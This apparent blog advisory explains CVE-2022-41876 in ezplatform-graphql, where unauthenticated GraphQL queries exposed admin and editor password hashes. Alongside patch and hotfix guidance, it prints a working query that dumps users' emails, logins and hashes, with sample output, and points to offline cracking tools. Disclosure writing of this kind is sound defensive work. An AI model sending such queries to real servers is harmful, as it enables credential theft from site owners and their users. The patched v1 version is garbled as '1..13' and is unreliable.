On October 26, 2022, a critical vulnerability was disclosed in the ezplatform-graphql package—a popular GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Identified as CVE-2022-41876, this flaw allowed *unauthenticated* users to extract sensitive information, including administrator and editor password hashes, via GraphQL queries. In this guide, we'll break down what happened, show you the nitty-gritty code details, explain how the exploit works, and walk you through the fix if you can’t upgrade right now.
What is ezplatform-graphql?
ezplatform-graphql enables powerful API access via GraphQL on top of Ibexa's content management systems (CMS). It's widely used for enabling apps or third-party services to fetch or manipulate content in a flexible way.
Insecure Storage of Sensitive Information
Before versions 2.3.12 (for the v2 branch) and 1..13 (for the v1 branch), ezplatform-graphql had a major security oversight: the GraphQL schema would expose the passwordHash field on user accounts. Worse—you didn’t need to be logged in! Anyone could craft a query to list users and dump their password hashes (and sometimes other personal info).
Even with strong hashes, attackers can attempt offline brute-force attacks.
- The users most affected are admins and editors—those with capability to manage most of your website.
Let's see what the GraphQL schema could look like (simplified!)
# src/bundle/Resources/config/graphql/User.types.yaml
User:
type: object
config:
fields:
passwordHash:
type: String
email:
type: String
login:
type: String
...
With this schema, an attacker could send the following POST request to your GraphQL endpoint
query {
users {
email
login
passwordHash
}
}
If not patched and no authentication applied, this request would succeed and output something like
{
"data": {
"users": [
{
"email": "admin@example.com",
"login": "admin",
"passwordHash": "$2y$10$e1lv...longbcrypthash"
},
// more users...
]
}
}
Now, an attacker can grab the hash and use offline tools (hashcat, john-the-ripper) to try and crack the password.
For v1.x users: Upgrade to version 1..13 or newer.
Ibexa’s Official Security Advisory
Can’t Upgrade? Hotfix it Yourself
You must remove (or restrict access to) the passwordHash (and similar) fields from the GraphQL schema manually.
Open src/bundle/Resources/config/graphql/User.types.yaml
User:
type: object
config:
fields:
# Remove or comment out unsafe fields!
# passwordHash:
# type: String
# hashType:
# type: String
# email:
# type: String
# login:
# type: String
# Keep only non-sensitive fields!
name:
type: String
...
Then, clear cache and redeploy
php bin/console cache:clear
You can also further restrict by adjusting access controls if possible.
Patched releases: 2.3.12, 1..13
- Public Disclosure: GitHub Security Advisory ID: GHSA-gw3h-3757-hq36
- CVE issued: CVE-2022-41876 on NVD
References
- GitHub Security Advisory: CVE-2022-41876
- NVD listing for CVE-2022-41876
- ezplatform-graphql GitHub repository
What Should You Do?
If you use ezplatform-graphql before the patched versions, upgrade ASAP. If upgrading isn’t possible, hotfix your GraphQL schema *now* to remove sensitive outputs. Check for unauthorized API traffic—if you’re on an affected version and exposed the endpoint publicly, consider a forced reset for user passwords as a precaution.
Stay safe! Always keep software up to date, audit your API schemas, and never expose sensitive information accidentally.
*Post exclusive for developers and IT administrators. For questions, reach out or join the Ibexa Community for best practices.*
Timeline
Published on: 11/10/2022 21:15:00 UTC
Last modified on: 11/15/2022 20:10:00 UTC